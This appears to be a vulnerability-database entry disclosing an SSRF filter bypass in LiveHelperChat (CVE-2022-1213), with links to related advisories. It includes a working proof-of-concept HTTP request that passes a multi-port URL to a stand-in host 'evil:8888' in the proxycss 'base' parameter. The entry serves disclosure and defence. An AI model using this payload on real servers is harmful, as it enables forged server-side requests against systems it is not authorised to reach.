Lucene search
Nhienit2010084387F6-5B9C-4017-BAA2-5FCF65B051E1HistoryApr 04, 2022 - 1:14 a.m.
SSRF filter bypass port 80, 433
2022-04-0401:14:04
nhienit2010
www.huntr.dev
25
ssrf
vulnerability
filter bypass
EPSS
0.001
Percentile
30.4%
Description
To exploit vulnerability, someone must pass a “base” parameters with a url multi-port to bypass filter check.
Proof of Concept
GET /index.php/cobrowse/proxycss/1?base=http://evil:8888:80/&css=index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESS02163d6deb6c206a82729b5648c7ccb7=VGWS8m-s8l4LTBWIdx4SLEWp_4CV9zQUVMQe3TH-r5k; sugar_user_theme=SuiteP; ck_login_id_20=1; ck_login_language_20=en_us; lhc_rm_u=OZNdQ2asyhNnFWUiUssqS4RZIpsGw1%3A2%3A8832b6cb3f51bd8dfb6ef6068cca39ad9425a209; lhc_vid=592659a2bfdb4f609558
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
the server will make http request to evil:8888
Related
osv
osv
BIT-livehelperchat-2022-1213
2024-03-06 10:55:47
CVE-2022-1213
2022-04-05 04:15:08
Server side request forgery in LiveHelperChat
2022-04-06 00:01:32
cvelist
cvelist
github
github
Server side request forgery in LiveHelperChat
2022-04-06 00:01:32
nvd
nvd
CVE-2022-1213
2022-04-05 04:15:08
prion
prion
Server side request forgery (ssrf)
2022-04-05 04:15:00
cve
cve
CVE-2022-1213
2022-04-05 04:15:08